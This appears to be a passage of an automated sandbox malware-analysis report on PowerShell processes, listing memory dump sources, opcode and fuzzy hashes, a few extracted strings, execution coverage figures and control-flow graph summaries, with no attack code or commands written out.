                                                                                • Source File: 00000004.00000002.1788373406.00007FF7BFFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bffc0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c91e1e52867a6d7f838b687d245481b2ea4de79835da0d23d9d758dee61c9a83
                                                                                • Instruction ID: 279e46371ffb90ba3250b65df41a9976267817453adfc629196a7e05f9b03377
                                                                                • Opcode Fuzzy Hash: c91e1e52867a6d7f838b687d245481b2ea4de79835da0d23d9d758dee61c9a83
                                                                                • Instruction Fuzzy Hash: C9024431A0CAD94FE795EF6C84642F4BBE1EF66B21F4805BAC15DC7197DA29AC01C350

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1788373406.00007FF7BFFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bffc0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0bdaaa6e6292868e45e80fec2541ff8581d77ed1831a39ef2d014bad75a985ce
                                                                                • Instruction ID: b739e836ff78550eca9e77cfc343fb22ea1da9b9f7d8574796df14ca18cdd8e9
                                                                                • Opcode Fuzzy Hash: 0bdaaa6e6292868e45e80fec2541ff8581d77ed1831a39ef2d014bad75a985ce
                                                                                • Instruction Fuzzy Hash: DDD19731A0DADA4FE795EF6C48151F9BBA1EF16760B4806FEC05DC70D3CA18A815C361

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1788373406.00007FF7BFFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bffc0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8d94950a6e2b7e48a8831e50ab2959d420a83b7a88683ee447c6095341e4f70
                                                                                • Instruction ID: d058072fb9fc4d6d6ef107b54b86e1e1124754e73f13a0240ed753965a22baa9
                                                                                • Opcode Fuzzy Hash: d8d94950a6e2b7e48a8831e50ab2959d420a83b7a88683ee447c6095341e4f70
                                                                                • Instruction Fuzzy Hash: C1910231E08A9A4FE794EF5C84642B8F7E1FF66B16F8409BAD51DC3296CE24BC418750
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5K_^$`c4
                                                                                • API String ID: 0-3352721459
                                                                                • Opcode ID: 40f1b21901c1da0cba3e37044ee9ec07390ebefeb2d2cdb82f3cea4698556303
                                                                                • Instruction ID: ee0f890a7e091b3c9ba7fa772e737bd16a5a65dd46f75caace07e7b532a26700
                                                                                • Opcode Fuzzy Hash: 40f1b21901c1da0cba3e37044ee9ec07390ebefeb2d2cdb82f3cea4698556303
                                                                                • Instruction Fuzzy Hash: 0B511173D0C5661DEA157BBCB8510F9A720EF123BAF0483B3D26CCE08B9D18745252E8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `c4
                                                                                • API String ID: 0-4097900969
                                                                                • Opcode ID: 7ba0ceb1dabd1a46f68678e584af1f502ff890c0c40f163c006ee1e7474948f9
                                                                                • Instruction ID: 0edeaf8aece25a12d5b86378093122678115adc88c2b60c4a9155618c9293fc9
                                                                                • Opcode Fuzzy Hash: 7ba0ceb1dabd1a46f68678e584af1f502ff890c0c40f163c006ee1e7474948f9
                                                                                • Instruction Fuzzy Hash: 3651E173D0C5661DEA157BBCB8510F9E720EF523BAF0483B3D25C8E08B9D18745652E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 76401f08d8a560cb2f797038ee50cd7bd675e265af0cb74f048a94e164be1863
                                                                                • Instruction ID: 1545db075f41e16b79f3d17b9ee2f7346fde312fe00c46b7e22f336bcade1fa1
                                                                                • Opcode Fuzzy Hash: 76401f08d8a560cb2f797038ee50cd7bd675e265af0cb74f048a94e164be1863
                                                                                • Instruction Fuzzy Hash: B842143090CAC94FEB68EF28C8157E8B7E0FF66701F44417ED95DCB296DA34A9068791
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fd2e7b475d4b777cef3cd07e663abcde0c24e2926bf77b97d7ce97c645b67e4e
                                                                                • Instruction ID: 531c920780fabd6b3fe23d25d402f161a9817ec301945b1e88e9b753c2c7c160
                                                                                • Opcode Fuzzy Hash: fd2e7b475d4b777cef3cd07e663abcde0c24e2926bf77b97d7ce97c645b67e4e
                                                                                • Instruction Fuzzy Hash: 30120530918A8A8FEBA8EF6CC845BF8B7D0FF69701F40417AD91DC7295DE34A9058791
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4c3b90a4ac9b604b6ddc0e0548d36d4513b2da3e159d0ecdb8cd05a220f3871
                                                                                • Instruction ID: e8aa78439ae6db7e73cd76810f13496cb469e6738546f425bfa46251881300f1
                                                                                • Opcode Fuzzy Hash: b4c3b90a4ac9b604b6ddc0e0548d36d4513b2da3e159d0ecdb8cd05a220f3871
                                                                                • Instruction Fuzzy Hash: 03D1D530908A8D8FEB68EF28D8557F977E1FF95310F44426EE84DC7295CB74A9448B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd

Execution Graph

Execution Coverage: 3.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
[Execution graph rendered as a figure; recoverable path: 7ff7bfee6c34 -> 7ff7bfee6c3d (LoadLibraryExW) -> 7ff7bfee6ced]

Control-flow Graph

[Control-flow graph rendered as a figure, with executed and not-executed blocks marked; basic blocks span 7ff7bfee6c34-7ff7bfee6d1a, with the LoadLibraryExW call in block 7ff7bfee6cb9-7ff7bfee6ceb]
Memory Dump Source
• Source File: 0000000B.00000002.1954981292.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7bfed0000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

[Control-flow graph rendered as a figure, with executed and not-executed blocks marked; basic blocks span 7ff7bffa3413-7ff7bffa378b, with no API call nodes in the graph]
Memory Dump Source
• Source File: 0000000B.00000002.1955683014.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff7bffa0000_powershell.jbxd